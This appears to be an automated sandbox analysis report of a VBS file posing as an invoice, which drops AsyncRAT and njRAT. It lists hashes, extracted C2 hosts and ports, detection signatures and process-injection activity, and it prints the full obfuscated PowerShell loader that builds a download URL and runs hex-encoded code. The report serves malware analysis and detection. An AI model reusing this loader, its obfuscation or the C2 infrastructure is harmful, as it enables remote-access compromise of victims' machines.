asyncrat | c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882

General

Target

V00GH01_Invoice_Copy.vbs
Size

3KB
MD5

f0eb4b843b026d5d100f69d47c2f576e
SHA1

f29356a70659a502ef8eea82fef2cc05e92d80fd
SHA256

c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882
SHA512

57165f90091e183b248dc0cb8f7a8ca8dffa68818b4bbc045e7128ed13326c71e94de1111daefcd6875438afe3b2b765d51195ea1e3a0f8e986c74956f00c801

Score

10^/10

asyncrat njrat default hacked rat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://52.188.147.221/All%20in%20One/fj.txt

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

jilldoggyy.duckdns.org:7840

jilldoggyy.duckdns.org:7829

jilldoggyy.duckdns.org:7841

103.147.185.192:7840

103.147.185.192:7829

103.147.185.192:7841

Mutex

AsyncMutex_6SI8OkPnk

Attributes

anti_vm
false
bsod
false
delay
3
install
false
install_folder
%AppData%
pastebin_config
null

aes.plain

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

C2

20.194.35.6:8023

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3976-160-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/3976-161-0x000000000040C77E-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 1656 powershell.exe
8 1656 powershell.exe

flow	pid	process
2	1656	powershell.exe
8	1656	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1656 set thread context of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 set thread context of 4000	1656	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exe

pid	process
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

powershell.exeaspnet_compiler.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	3976	aspnet_compiler.exe
Token: SeDebugPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe
Token: 33	4000	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4000	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 3580 wrote to memory of 1656	3580	WScript.exe	powershell.exe
PID 3580 wrote to memory of 1656	3580	WScript.exe	powershell.exe
PID 1656 wrote to memory of 992	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 992	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 992	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3976	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 2648	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 2648	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 2648	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3496	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3496	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3496	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3308	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3308	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 3308	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe
PID 1656 wrote to memory of 4000	1656	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\V00GH01_Invoice_Copy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://52H-H188H-H147H-H221/All%20in%20One/fjH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:992
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3308
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1656-116-0x0000000000000000-mapping.dmp

Download
memory/1656-122-0x00000235AD840000-0x00000235AD841000-memory.dmp

Filesize
4KB

Download
memory/1656-127-0x00000235C7E90000-0x00000235C7E91000-memory.dmp

Filesize
4KB

Download
memory/1656-129-0x00000235C5DB3000-0x00000235C5DB5000-memory.dmp

Filesize
8KB

Download
memory/1656-128-0x00000235C5DB0000-0x00000235C5DB2000-memory.dmp

Filesize
8KB

Download
memory/1656-130-0x00000235C5DB6000-0x00000235C5DB8000-memory.dmp

Filesize
8KB

Download
memory/1656-145-0x00000235C5DB8000-0x00000235C5DB9000-memory.dmp

Filesize
4KB

Download
memory/1656-157-0x00000235AD8B0000-0x00000235AD8B4000-memory.dmp

Filesize
16KB

Download
memory/3976-160-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3976-161-0x000000000040C77E-mapping.dmp

Download
memory/3976-178-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/3976-181-0x0000000005250000-0x0000000005251000-memory.dmp

Filesize
4KB

Download
memory/4000-171-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4000-172-0x000000000040836E-mapping.dmp

Download
memory/4000-176-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/4000-177-0x00000000059F0000-0x00000000059F1000-memory.dmp

Filesize
4KB

Download
memory/4000-182-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/4000-183-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/4000-184-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads